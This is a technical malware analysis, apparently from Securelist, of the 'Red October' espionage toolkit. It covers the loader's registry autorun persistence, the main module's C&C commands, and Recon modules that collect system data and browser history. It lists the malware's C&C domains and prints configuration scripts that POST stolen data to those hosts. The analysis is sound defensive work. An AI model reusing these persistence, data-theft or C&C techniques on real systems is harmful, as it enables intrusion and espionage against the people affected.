2541C266893A45F393112C6F15C2A0C7 2011.01.13 07:59:02 (GMT) 2010.10.11 14:14:34 (GMT)
B0D190A48E749B2688E7A90CE3926E84 2011.03.09 08:58:07 (GMT) 2011.03.03 12:50:46 (GMT)
3E35C7C39BC71BADFE9AD15752C2DDDE 2012.09.06 10:30:38 (GMT) 2011.03.15 07:43:59 (GMT)
EBCCD9FC831B168D872F6556B4A42DAC 2011.03.15 08:33:11 (GMT) 2011.03.15 07:43:59 (GMT)
7AAC26EA551EC67882E14C388E436F10 2011.03.15 09:06:51 (GMT) 2011.03.15 07:43:59 (GMT)
5F1D10F7CA9E1B9C301872B1BC4B8A18 2011.05.06 07:58:13 (GMT) 2011.03.15 07:43:59 (GMT)
812FC1780548F0611E3F4105E48E518A 2011.05.26 11:04:38 (GMT) 2011.03.15 07:43:59 (GMT)
DC0A5753F9885D0BA71ECEA767F91564 2011.07.20 11:06:28 (GMT) 2011.03.15 07:43:59 (GMT)
D44966B31FC6BAFF97AE23EA53A6DFF0 2011.10.06 14:05:34 (GMT) 2011.03.15 07:43:59 (GMT)
141DC8FD84D985F792DE9747F63C6A4C 2011.03.14 15:00:23 (GMT) 2011.03.03 12:50:46 (GMT)
8CE5E706D956D28F6412C38FC5911DCE 2011.03.09 08:18:38 (GMT) 2011.03.03 12:50:46 (GMT)
0C4D3483AD48A4751E288993388E03D2 2011.03.14 14:49:50 (GMT) 2011.03.03 12:50:46 (GMT)
9BD07F7DC5E26F022FDEA386D35EAC68 2011.03.09 07:46:51 (GMT) 2011.03.03 12:50:46 (GMT)
1754024F9932DC25691CDB90D8FAC632 2011.04.13 05:34:30 (GMT) 2011.03.15 07:43:59 (GMT)
4168EEF52CD458B253EBE62B8DAF75AC 2011.03.14 13:34:01 (GMT) 2011.03.03 12:50:46 (GMT)
2B62D48C9D728C5D9650B39E0119F1B7 2010.11.12 09:29:19 (GMT) 2010.10.11 14:14:34 (GMT)
EA74E951111ED2E046B87C0A9241FC25 2012.08.02 05:59:07 (GMT) 2011.03.15 07:43:59 (GMT)
3BE885097DBD3DF03B568D1E248A2E4C 2012.09.13 09:41:13 (GMT) 2011.03.15 07:43:59 (GMT)
B952997DD0AB0B58F916AF89A5C3E4BD 2011.04.29 10:02:22 (GMT) 2011.03.15 07:43:59 (GMT)
2216490B1C09BB9B4E07AD05A1552FE9 2012.04.06 11:35:36 (GMT) 2011.03.15 07:43:59 (GMT)
DBE4C33F6C482D571305589207A3F910 2011.03.14 14:57:27 (GMT) 2011.03.03 12:50:46 (GMT)
8E88185368C9C2C53014E0BAEFCE3066 2011.03.09 08:05:16 (GMT) 2011.03.03 12:50:46 (GMT)
3. Loader moduleKnown file locations:
%PROGRAMFILES%\Windows NT\svchost.exe %PROGRAMFILES%\Windows NT\svclogon.exe
The module is a PE EXE file, compiled with Microsoft Visual Studio 2005.
This module is created by the first-stage dropper of the malware, usually from a file containing an exploit.
It creates a system event object using name patterns:
“WIN_%08X%08X%08X%08X%08X”, where “%08X” parameters are replaced by the hexadecimal value of the filebody checksum (SHA1)."SYS_%08X%08X%08X%08X%08X", where “%08X” parameters are replaced by the hexadecimal value of the filename checksum (SHA1).
Then, the module checks if it was granted administrative rights and sets corresponding flag, which is used in severalsubroutines.
The module generates a CLSID from the value of the SHA1 checksum of the system directory path and the volume serialnumber of the system drive.
Then, it tries to read the default value of the following registry key:
HKLM\Software\Classes\CLSID\generated_CLSID (if it has administrative rights)HKCU\Software\Classes\CLSID\generated_CLSID (if it has no administrative rights)
It checks the contents of the default key value. This check succeeds if the registry key is not present or its value is equal tothe last DWORD of the file’s SHA1 checksum. Otherwise the check fails and it runs the check again each 3 millisecondsfor 4294967294 times.
Then, it sets the default value of the registry key to the hexadecimal representation of the value of the last SHA1’s DWORDand tries to read the registry value “InfoTip” from the same registry key. The registry value is assumed to be a 48-byte
binary buffer. It reads the time value from that buffer and exits if the difference between the recorded time and current timeis less than 3 days.
This means that the updated modules can be delivered not sooner than in three days to the same victim. If someone triesto reinfect the system with the same dropper, it refuses to do so within 3 days from last infection. This can also be amechanism to escape from attention of power users or administrators who can run recently opened suspicious applicationagain and monitor its activity.
Then, it starts a registry installation thread and proceeds to its main loop.
Registry installation threadEvery 100 seconds the module ensures that it has been registered for autorun using one of the registry keys:
If launched as administrator, it appends path to its own filename to:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
Else, it writes a registry value in:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\%autorun key% =”path to itself”
Possible Autorun key values that we have observed:
Name of the encrypted main module Name of the “Run” registry value
fsmgmtio32.msc DotNet32
cfsyn.pcs SdbChk
frpdhry.hry Hre32
ime64ex.ncs SrvCC32
io32.ocx Ocx32
lhafd.gcp Lha
lsc32i.cmp Lsc32
ocxstate.dat NtNdsc
opdocx.gxt Scpsts
sccme.hrp Lhrp
scprd.hrd Srsf
syncls.gxk Mslisht
lgdrke.swk Sltrdbe
sdlvk.acx Ltsmde
wsdktr.ltp Lsrtmpx
synhfr.pkc Msdcc
scpkrp.gmx Dbxchek
rfkscp.pck Cskcmp
qsdtlp.rcp Klsmod
Main loopThe module runs a loop with random Sleep() delays, and checks if it can fetch one of the URLs at microsoft.com.
Name of the encrypted main module Hostnames
fsmgmtio32.msc update.microsoft.com, www.microsoft.com
Other update.microsoft.com, www.microsoft.com,support.microsoft.com
If any of the URLs are available, it starts the loader thread with a filename of the main module (see Appendix A) as aparameter. Then, it updates the “InfoTip” registry key with current time value and SHA1 of its filename. It also stores ownProcess ID in that value.
The module reads the proxy server settings of Internet Explorer, Firefox, Opera and tries to fetch URLs via proxies whendirect connection is not available.
Loader ThreadThe module reads the file that contains the main module, decrypts it using RC4 with a hard-coded key, and thendecompresses it using the Zlib library. Then, it checks that the decompressed buffer contains a PE file and starts the PEloader thread.
PE loader ThreadThe module implements its own PE loader. The file that is loaded is expected to be a DLL. After loading and relocating thePE, the module calls its DllMain function twice (DLL_PROCESS_ATTACH, DLL_PROCESS_DETACH) and returns.
4. Main componentThe file is a PE DLL file, no export symbols, compiled with Microsoft Visual Studio 2005.
DllMain functionThe module sets a timer with a callback function to be executed every 900 seconds and starts a Windows message loop.
Timer callback functionThe module checks if the computer is connected to the Internet (using InternetGetConnectedState API) and if it isconnected, starts its main thread.
HTTP Traffic generated by the main component.
Main threadThe module prepares a 98-byte buffer that contains several unique machine identifiers using its system drive’s serialnumber, network adapters’ MAC addresses and Internet Explorer registration ID. The buffer also contains a unique hard-coded hexadecimal string that appears to be a victim or campaign ID and a hard-coded DWORD value.
Then, it sends this buffer to a first available C&C server from a hardcoded list using HTTP POST requests. The moduleexpects to receive an encrypted response packet from the server. It decrypts the packet with a simple XOR algorithm, andexecutes one of the following commands depending on the data contained in the packet:
Load the Dll from the packet in memory and execute its DllMainWrite the packet to a file in temporary/windows/system directory and execute it using CreateProcess()Load a Dll by specified local path and call its DllMain, or execute a program given its pathWrite the packet to a file in temporary/windows/system directoryWrite the contents of the packet to %TEMP%\bestcrypt_update.exe and (optional part) %TEMP%\bestcrypt_update.dlland execute the EXE file
C&C server usage timeline
Year C&C domain names URL
2007 msgenuine.net /cgi-bin/view
2008 msinfoonline.org /cgi-bin/a/slice
2009 microsoftosupdate.com;microsoft-msdn.com;microsoftcheck.com /cgi-bin/ms/check
osgenuine.com;wingenuine.com;update-genuine.com /cgi-bin/gen/jau
2010 drivers-update-online.com;drivers-get.com;drivers-check.com /cgi-bin/driver/info
genuine-check.com;genuineservicecheck.com;genuineupdate.com /cgi-bin/genuine/a
msonlineupdate.com;msonlinecheck.com;msonlineget.com /cgi-bin/online/set
os-microsoft-check.com;os-microsoft-update.com;os-microsoft-online.com
/cgi-bin/microsoft/dev
windowscheckupdate.com;windows-genuine.com;windowsonlineupdate.com /cgi-bin/win/wcx
2011 dll-host-update.com;dll-host-check.com;dll-host.com /cgi-bin/dllhost/ac
genuine-check.com;genuineservicecheck.com;genuineupdate.com /cgi-bin/genuine/a
microsoftosupdate.com;microsoft-msdn.com;microsoftcheck.com /cgi-bin/ms/check
ms-software-check.com;ms-software-update.com;ms-software-genuine.com /cgi-bin/software/tau
nt-windows-online.com;nt-windows-update.com;nt-windows-check.com /cgi-bin/nt/th
svchost-check.com;svchost-online.com;svchost-update.com /cgi-bin/svchost/uat
2012 csrss-check-new.com;csrss-update-new.com;csrss-upgrade-new.com /cgi-bin/csrss/dfl
ms-software-check.com;ms-software-update.com;ms-software-genuine.com /cgi-bin/software/tau
nt-windows-online.com;nt-windows-update.com;nt-windows-check.com /cgi-bin/nt/th
svchost-check.com;svchost-online.com;svchost-update.com /cgi-bin/svchost/uat
wins-driver-check.com;wins-driver-update.com;win-driver-upgrade.com /cgi-bin/ntdriver/ton
Main component file names
Year File name of the main component
2007 netads.dat
2008 smartiosys.dbn
2009 smartiosys.dbn
2010 fsmgmtio32.msc
ime64ex.ncs
ocxwinsmb.tlb
2011 frpdhry.hry
ime64ex.ncs
io32.ocx
lhafd.gcp
lsc32i.cmp
ocxstate.dat
sccme.hrp
scprd.hrd
2012 klsldr.slr
lgdrke.swk
lsmpdr.vcs
mbdsec.sdx
ocxstate.dat
opdocx.gxt
qsdtlp.rcp
rfkscp.pck
scpesc.ecs
scpkrp.gmx
sdlvk.acx
syncls.gxk
synhfr.pkc
wsdktr.ltp
Example of C&C communication session(two bytes of the User ID were removed)
“Red October”. Detailed Malware Description 2. SecondStage of Attack - SecurelistИсточник: http://www.securelist.com/en/analysis/204792268/Red_October_Detailed_Malware_Description_2_Second_Stage_of_Attack
“Red October”. Detailed Malware Description 2. Second Stage of AttackFirst stage of attack
1. Exploits2. Dropper3. Loader Module4. Main component
Second stage of attack1. Modules, general overview2. Recon group3. Password group4. Email group5. USB drive group6. Keyboard group7. Persistence group8. Spreading group9. Mobile group
10. Exfiltration group
1. Modules, general overviewModule frameworkThe main component of Sputnik implements a framework for executing the “tasks” that are provided by its C&C servers.
Most of the tasks are provided as one-time PE DLL libraries that are received from the server, executed in memory and thenimmediately discarded.
Several tasks need to be constantly present, i.e. waiting for the iPhone or Nokia mobile to connect. These tasks are providedas PE EXE files and are installed to the infected machine.
Persistent tasksOnce a USB drive is connected, search and extract files by mask/format, including deleted files. Deleted files arerestored using a built in file system parserWait for an iPhone or a Nokia phone to be connected. Once connected, retrieve information about the phone, its phonebook, contact list, call history, calendar, SMS messages, browsing historyWait for a Windows Mobile phone to be connected. Once connected, infect the phone with a mobile version of theSputnik main componentWait for a specially crafted Microsoft Office or PDF document and execute a malicious payload embedded in thatdocument, implementing a one-way covert channel of communication that can be used to restore control of the infectedmachineRecord all the keystrokes, make screenshotsExecute additional encrypted modules according to a pre-defined schedule
Retrieve e-mail messages and attachments from Microsoft Outlook and from reachable mail servers using previouslyobtained credentials
One-time tasksCollect general software and hardware environment informationCollect filesystem and network share information, build directory listings, search and retrieve files by mask provided bythe C&C serverCollect information about installed software, most notably Oracle DB, RAdmin, IM software including Mail.Ru agent,drivers and software for Windows Mobile, Nokia, SonyEricsson, HTC, Android phones, USB drivesExtract browsing history from Chrome, Firefox, Internet Explorer, OperaExtract saved passwords for Web sites, FTP servers, mail and IM accountsExtract Windows account hashes, most likely for offline crackingExtract Outlook account informationDetermine the external IP address of the infected machineDownload files from FTP servers that are reachable from the infected machine (including those that are connected to itslocal network) using previously obtained credentialsWrite and/or execute arbitrary code provided within the taskPerform a network scan, dump configuration data from Cisco devices if availablePerform a network scan within a predefined range and replicate to vulnerable machines using the MS08-067 vulnerabilityReplicate via network using previously obtained administrative credentials
Module Groups
Groupname Descrition
Recon
Modules of this group designed to be used during first stage of cyberattack right after initial infiltration. Their mainpurpose is to collect general information about target system which helps locate and identify the infected machine,estimate potential value of current computer data and define which other modules should be pushed next. Also, thesemodules collect initial easy-to-get type of information such as browser history, browser cached credentials and FTPclient settings.
PasswordThis group of modules is designed to steal credentials from various applications and resources, from Mail.ru Agent(popupal free app from mail.ru) to MS Outlook credentials and Windows account hashes (including cached WindowsDomain account hashes). Capable of using low-level and direct disk access to copy protected files.
Email This group serves stealing emails from local MS Outlook storage or remote POP3/IMAP mail server. It’s capable ofdumping full email bodies with headers, saving attachments with predefined file extensions.
USB drive
This group is used to steal files from attached USB devices. It monitors USB device events and starts every time newdevice is attached. It can copy files from predefined extension list, size and age. This group capable of recognition,restoration and copying already deleted files of MS Office document formats by using own FAT-based filesystemparser.
Keyboard This group is dedicated to recording keystrokes, grabbing text from password input fields and making screencaptures.
Persistence
Current group contains installer and payload code to plant a plugin in popular applications such as MS Office or AdobeReader. The backdoor code is activated when specially crafted document is opened on target machine. This is used toregain lost access on a machine in case of unexpected loss of control (C&C server takedown or local malwarecleaning).
SpreadingModules of this group are used to scan for other hosts on the network, fingerprint them and then infect via MS08-067or a list of stolen admin credentials. A module from this group is capable of dumping Cisco network routerconfiguration via SNMP commands and embedded TFTP server.
MobileMobile group is used to dump all valuable information about locally attached mobile device. It is capable of copyingcontact information, calendars, SMS and Emails databases and many other private data. These modules are capable of
checking if a device was jailbroken.
Exfiltration
While some of other modules work in “offline” mode, collect and store data locally, this group of modules transfers allcollected data to the C&C server. Modules of this group are capable of reaching FTP servers, remote network sharesas well as local disk drives and copy files from these resources. Unlike Recon data collection modules these modulesare designed to run repeatedly and bring only new valuable data.
Missing Modules
Groupname Descrition
USBInfection
There are modules that copy data files (such as execution logs) related to current malware family from USB drives.However, we haven’t seen a module to infect the USB drives yet. We suspect that this module is capable of infectingremovable storage, running arbitrary modules from other groups and save data back to the USB drives.
Module comparison table
2. Recon groupRegConn moduleKnown variants:
MD5 Size Compilation date (payload)
5447848f3a5fdaf97c498190ed501620 167,936 bytes October 22nd, 2011
SummaryGathers system related information. Records installed and recently run software, related application launch timestamps,enumerates attached usb devices like mobile phones and looks for software from this devices, checks for presence ofcustom enterprise software, maintains unfinished/unreferenced download+execute functionality, sends encrypted collecteddata at one of C&C servers (i.e. nt-windows-online.com;nt-windows-update.com;nt-windows-check.com). This module is a Win32 Dll file. C runtime and several other libs statically linked into the executable with variousoptimizations enabled. All functionality is in DllMain function, no export names defined. Compiled with MS Visual C++ 2005.
Sequence of systems monitoring tasks1. Gathers startup information, select environment variables and values %windir%, %username%, %userdomain%,
%computername%)
2. Opens target directory c:\windows\prefetch, records all entries in the directory of applications recently run along withtimestamp, i.e.
PREFETCH DEFRAG.EXE-273F131E.pf.2012-10-31 18:32:37PREFETCH DUMPBIN.EXE-0751B17C.pf.2012-11-01 23:45:39
Loops through registry, attempts to access and record all recently used application data, i.e.
C:\Program Files\Common Files\Java\Java Update\jusched.exe, REG_SZ, Java(TM) Update Scheduler
C:\Documents and Settings\p\Local Settings\Application Data\Google\Update\GoogleUpdate.exe, REG_SZ, Google Installer
C:\Program Files\Messenger\msmsgs.exe, REG_SZ, Windows Messenger
Attempts to access and record a set of hardcoded registry keys related to enterprise software. Attempts to access andrecord related keys and values. Reports on success and failure of related key and value access, i.e.
REG ORACLE* CHECK (1) Software\Oracle\SunRay\ClientInfoAgent\DisconnectActions\@Default -> REG_SZ:""(1) Software\Oracle\Sun Ray\ClientInfoAgent\ReconnectActions\@Default -> REG_SZ:""
Attempts to access and record all registry keys and values related to context menu handlers and related executablepathnames, i.e.
Context MENU *\shellex\ContextMenuHandlers\7-Zip(1) *\shellex\ContextMenuHandlers\7-Zip\@Default -> REG_SZ: "{23170F69-40C1-278A-1000-000100020000}"(1) CLSID\{23170F69-40C1-278A-1000-000100020000}\@Default -> REG_SZ: "7-Zip ShellExtension"(1) CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\@Default -> REG_SZ: "C:\Program Files\7-Zip\7-zip.dll"(2) CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel -> REG_SZ: "Apartment"
Attempts to access and record registry keys and values related to auto-start applications enumerated under the HKCURun key and all HKLM\Userinit registry keys, i.e.
HKCU Run(1) SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VBoxTray ->REG_SZ: "C:\WINDOWS\system32\VBoxTray.exe"(2) SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched -> REG_SZ: "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
Attempts to access and record registry keys and values enabling email and webmail access under HKCU\Software\VBand VBA Program Settings\Webmailer, MSOffice settings, and HKCU\Software\Mail.ru\Agent\Agent, i.e.
REG_MRA Run(1) Software\Mail.Ru\Agent\Agent -> REG_SZ: "1"
Attempts to access and record registry keys and values related to hardcoded list of attached mobile devices and alsogeneral USB devices and mobile synchronization and contact software. Reports on success and failure of related keyand value access, i.e.
N2 RunERROR: can't make RegOpenKey for Software\Nokia\PC Suite at 412: 0MSG: The operation completed successfully
Attempts to access and record registry keys and values related to list of all installed software. Reports on success andfailure of related key and value access, i.e.
REG_SPEC_SSS_B Run(1) SOFTWARE\Classes\Installer\Products\0B79C053C7D38MEE4AB9A00CB3B5D2472\ProductName -> REG_SZ: "WebFldrs XP"
Attempts to access and record registry keys and values indicating the presence of Radmin v2.0 remote controlsoftware, i.e.
Radmin RunERROR: can't make RegOpenKey for SYSTEM\RAdmin\v2.0\Server\Parameters at 412: 0MSG: The operation completed successfully
Attempts to open Firefox prefs.js and profiles.ini configuration files. Attempts to open Opera profile.ini,profile/Opera6.ini configuration files. Reads these files and identifies network proxies for each along with credentialinformation. Retrieves Internet Explorer proxy preferences from the registry.Searches for the following file types in the registry and corresponding handler and attempts to record related data forthe following extensions:
.str .tte ._ok .ki .tel .tlg .zfc .encrypted .zm9 .dat
.crp .pcr .safe .ldf
As a part of the network activity loop, calls GetWindowsDirectoryA, GetDriveTypeA and GetVolumeInformation eachtime, collects hardware information most likely for unique identification. Attempts to resolve nt-windows-update.comdomain name.Following a successful call and return from WS2_32.WSAStartup and prior to WS2_32.gethostbyname, the collecteddata is encrypted.Attempts to connect to nt-windows-online.com. POSTs encrypted data to nt-windows-online.com/cgi-bin/nt/sk/.If POST to nt-windows-online.com fails, attempts the same process with nt-windows-check.com, nt-windows-update.com domains.If no connections are made, attempts to use configured web browser proxy settings and uses them to connect to thethree hard-coded domains listed above.Connects and POSTs the stolen configuration data.Maintains download and execute code. How this functionality is called at runtime is uncertain. There are no referencesto it at runtime, so it seems like something is missing or unfinished.
Hardcoded registry keys:HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICacheHKLM\Software\OracleHKCU\Software\CITHKCU\Software\CIT SoftwareHKLM\SoftwareHKLM\Software\BawHKLM\Software\Baw2HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKCR\*\shellex\ContextMenuHandlersHKCR\CLSID\
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonHKCU\SOFTWARE\VB and VBA Program Settings\WebMailer
HKCU\Software\Microsoft\Office\12.0\Common\GeneralHKCU\Software\Mail.Ru\AgentHKLM\SOFTWARE\Classes\Installer\ProductsHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SetupHKCU\SOFTWARE\Microsoft\Windows CE ServicesHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WindowsHKLM\Software\NokiaHKLM\Software\HTC\HKLM\System\CurrentControlSet\Control\DeviceClassesHKCR\SonyEricsson.PCCompanion.1\CLSIDHKLM\System\ControlSet001\Enum\Root\WPD\0000HKLM\SYSTEM\CURRENTCONTROLSET\ENUM\USBHKLM\SYSTEM\RAdmin\
Wnhttp module
Known variants:
MD5 Compilation date (payload)
1b840c5b45cd015f51010e12938b528a 2012.09.05 07:02:33 (GMT)
65820769534fec10958573d1c8a545a8 2012.09.05 07:02:33 (GMT)
SummaryThe file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. Known samples share onecode section, but contain different payloads in the resource section.All the functionality is implemented in the DllMain function.
This module is a plugin to check Internet connectivity and get an external IP address of current system using popular publicservices such as 2ip.ru, myip.ru, smart-ip.net.
DllMainThe module collects basic system information such as current computer name, current username, and path to the originalexecutable module where it started from. It creates a unique identifier of current system based on VolumeSerialNumberproperty of the disk where current Windows system is located or a hash of current computer name and ProductID value ofInternet Explorer from HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID. This information is put in thelog file in the first place along with current date and time.
This module loads a config/script from local resource AAA and sends out some network requests using standard WinInetAPI. The config/script AAA has the following contents:
SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")SetOption(conn_a.D_RPRT, [3] "80")SetOption(conn_a.D_SPRT, [3] "80")SetOption(conn_a.D_USER, [21] "%removed%")SetOption(conn_a.D_MODE, 0x0033)SetOption(conn_a.D_PASS, 0x00)SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")SetOption(conn_a.J_USER, [21] "%removed%")SetOption(conn_a.J_RPRT, [3] "80")
SetOption(conn_a.J_SPRT, [3] "80")SetOption(conn_a.J_MODE, 0x0033)SetOption(conn_a.J_PASS, 0x00)SetOption(conn_a.VERSION_ID, [6] "51070") SetOption(conn_a.SEND_DELAY_TIME, [6] "20000")SetOption(conn_a.VER_SESSION_ID, [11] "%removed%") SetOption(http_host, [7] "2ip.ru")SetOption(http_port, [3] "80")SetOption(http_path, 0x002F)SetOption(http_ua, [68] "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1")SetOption(http_headers, [177] "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: utf-8;q=0.7,*;q=0.7")Call(task_http)SetOption(http_host, [12] "www.myip.ru")SetOption(http_port, [3] "80")SetOption(http_path, 0x002F)SetOption(http_ua, [68] "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1")SetOption(http_headers, [177] "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: utf-8;q=0.7,*;q=0.7")Call(task_http)SetOption(http_host, [13] "smart-ip.net")SetOption(http_port, [3] "80")SetOption(http_path, 0x002F)SetOption(http_ua, [68] "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1")SetOption(http_headers, [177] "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: utf-8;q=0.7,*;q=0.7")Call(task_http)
While “conn_a” parameters are used to access C&C server during reporting stage, other parameters which start with "http_"are used to send out http requests. Target hosts as shown above are
1. 2ip.ru2. www.myip.ru3. smart-ip.net
The websites are used to get current IP address as it is visible on the Internet. If the machine is behind proxy or NAT router,the IP address might be different from the local one. Interestingly all websites of current module developers' choice areobviously owned by Russian-speaking people from former CIS countries, first two seem to be Russian and last one isUkrainian.
The module simply sends HTTP GET requests to the root page of the websites and gets the response code from theheaders as well as html/text source of the webpage, which is later uploaded to the C&C.
Current module doesn't create any local logs, instead all information is kept in memory, which is later compressed using Zlib1.2.5, encrypted, encoded with Base64 algorithm and submitted to the C&C server.
Sysinfo module
Known variants:
MD5 Compilation date
e36b94cd608e3dfdf82b4e64d1e40681 2012.09.05 09:02:30 (GMT)
a2fe73d01fd766584a0c54c971a0448a 2012.09.05 09:02:30 (GMT)
The files differ only by few values from resources section (which contains configuration data) – code is identical.
This module is a PE DLL, written in C++, compiled with Microsoft Visual Studio 2010.
DLL resides only in memory – it does not drop itself or any other executables to the disk.
It creates %USERPROFILE%\Local Settings\Temp\tmpXX.tmp file (where XX is randomly generated hex number). Duringthe analysis, the file stayed 0-bytes. Most probably, it's created for further data logs.
DLL collects a range of information about the computer (including the browsers history). This data is written to the memory,compressed with Zlib deflate() function – which also performs some XOR operations on it – encoded with base64 algorithmand sent by the HTTP POST request to the C&C server.
InitializationAfter it is loaded to the memory, malware loads and locks resource BBB:AAA:0000, which contains config information;
It gets the information about local system and current process:
computer nameuser namecurrent module namepid
Then it creates a separate thread, which contains the main module functionality.
Main malware threadFirst, it constructs an internal filename string "@INFO\SYSINFO_%u_%s.bin"
where %u is equal to 7 and %s is system time – obtained with use of GetLocalTime and SystemTimeToFileTime – in format:
"%04u%02u%02u_%02u%02u%02u_%03u"
if FileTimeToSystemTime failed, it uses the default time string:
"16010101_000000_000"
if wsprintfW failed, it uses the default hardcoded filename:
"@INFO\SYSINFO_X_00000000_000000_000.txt"
Then it reads the configuration from the resources section and builds the structure containing all the necessary information atspecific offsets. This structure is held only in memory.
It contains a resource named “AAA” with the following values in it:
SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")SetOption(conn_a.D_RPRT, [3] "80")SetOption(conn_a.D_SPRT, [3] "80")
SetOption(conn_a.D_USER, [21] "%removed%")SetOption(conn_a.D_MODE, 0x0033)SetOption(conn_a.D_PASS, 0x00)SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")SetOption(conn_a.J_USER, [21] "%removed%")SetOption(conn_a.J_RPRT, [3] "80")SetOption(conn_a.J_SPRT, [3] "80")SetOption(conn_a.J_MODE, 0x0033)SetOption(conn_a.J_PASS, 0x00)SetOption(conn_a.VERSION_ID, [6] "17486")SetOption(conn_a.SEND_DELAY_TIME, [6] "20000")SetOption(conn_a.VER_SESSION_ID, [11] "%removed%")Call(task_sysinfo)
Malware main thread calls 2 main subroutines:
retrieves a lot of system information, including browsing history, and writes it to the in-memory logtakes data from the configuration in resources to connect to the C&C and submit collected data
Data collectionMalware collects following information:
current file timelocal timeusernamecomputer nameis admin (if the user has administrative rights)languageansi code packageoem code packagetime zonecurrent module namecurrent directorytemp directory pathWindows directory pathsystem directory pathmajor OS versionminor OS versionbuild numberservice pack numberplatform id
Additionally, to obtain default applications for HTTP, HTTPS, HTMLFILE and MAILTO malware uses RegQueryValueEx tocheck following registry keys under
HKCR\ttp\shell\open\commandHKCR\https\shell\open\commandHKCR\htmfile\shell\open\commandHKCR\mailto\shell\open\command
Following parameters are retrieved for each disk, including optical drives and shared mounts:
root pathfilesystem namevolume namedrive typevolume serial numberfilesystem flagsmaximum component lengthsectors per clusterbytes per sectornumber of free clustersnumber of total clustersfree bytes availabletotal number of bytestotal number of free bytes
Then it collects information about local network adapters:
Adapter NameAdapter DescriptionAddress LengthAdapter MAC AddressAdapter IndexAdapter TypeDhcpEnabledCurrentIpAddressIpAddressListGatewayListDhcpServerHaveWinsPrimaryWinsServerSecondaryWinsServerLeaseObtainedLeaseExpires
The malware looks for URL history from following browsers:
Chrome, Mozilla Firefox, Internet Explorer, Opera
1. Chrome history:
Before the malware is performing the SQL queries on the browsers profile-files, it copies the original file into a temp-file.
To get the Tempfile path and name it makes use of GetTempPathW and GetTempFileNameW with prefix ”tmp”.
The Tempfile will be named like this:
tmpXX.tmp
Where XX is a 2-digit number starting from 00.
Malware use following SQL query:
SELECT * FROM urls
to extract URLs (with titles, last visited date) from Chrome history database:
\Google\Chrome\User Data\Default\History
2. Mozilla history (sub_10015430):
Malware use following SQL query:
SELECT * FROM moz_places
to extract URLs from Mozilla history database:
\Mozilla\Firefox\Profiles\%profilename%\places.sqlite
In both cases, malware performs SQL related actions with use of functions from embedded SQL library (most probably partsof sqlite3.dll).
3. IE history (sub_10014F50):
Malware calls CoCreateInstance function with following values:
CLSID 3C374A40-BAE4-11CF-BF7D-00AA006946EE Microsoft Url History ServiceRIID AFA0DC11-C313-11D0-831A-00C04FD5AE38 SID_IUrlHistoryStg2
i.e. it uses IUrlHistory interface to search through the history and calls SHDOCVW!CEnumSTATURL to enumerate URLs.
It also makes use of shdocvw.dll which is responsible to get control over IE. The call-adresses are resolved dynamically:
4. Opera history (sub_10014EB0):
Malware gets the Opera folder path and searches it for URLs in files:
global_history.dat, global.dat
All above subroutines retrieves URL + Title + Last Visited Time and write them to the memory (after the previous data).
Also, a DNS resolve is performed on all domain names.
This module also calls GetEnvironmentStrings to retrieve all environment variables.
It is also interested in current Windows Domain information
DomainControllerNameDomainControllerAddressDomainControllerAddressTypeDomainGuid DomainNameDnsForestNameFlags DcSiteName ClientSiteName
The malware looks for all running processes and all modules loaded into their address space. For each file it retrievesfollowing values from the version info:
\StringFileInfo\%04x%04x\SpecialBuild\StringFileInfo\%04x%04x\PrivateBuild\StringFileInfo\%04x%04x\ProductVersion\StringFileInfo\%04x%04x\ProductName\StringFileInfo\%04x%04x\OriginalFilename\StringFileInfo\%04x%04x\LegalTrademarks\StringFileInfo\%04x%04x\LegalCopyright\StringFileInfo\%04x%04x\InternalName\StringFileInfo\%04x%04x\FileVersion\StringFileInfo\%04x%04x\FileDescription\StringFileInfo\%04x%04x\CompanyName
It looks for installed programs information by enumerating registry key:
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
For each entry it retrieves following values:
DisplayNameDislayVersionDisplayIconInstallDateUninstallStringInstallSourceInstallLocation
It retrieves information about installed USB devices.
Class GUID is hardcoded and equals:
{A5DCBF10-6530-11D2-901F-00C04FB951ED} → GUID_DEVINTERFACE_USB_DEVICE
The malware checks registry for proxy settings and extracts proxy address somewhere (to some struct or class in thememory) if present:
[HKLM|HKCU]
\Software\Microsoft\Windows\CurrentVersion\Internet Settings@ProxyServer
\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\InternetSettings@ProxyServer
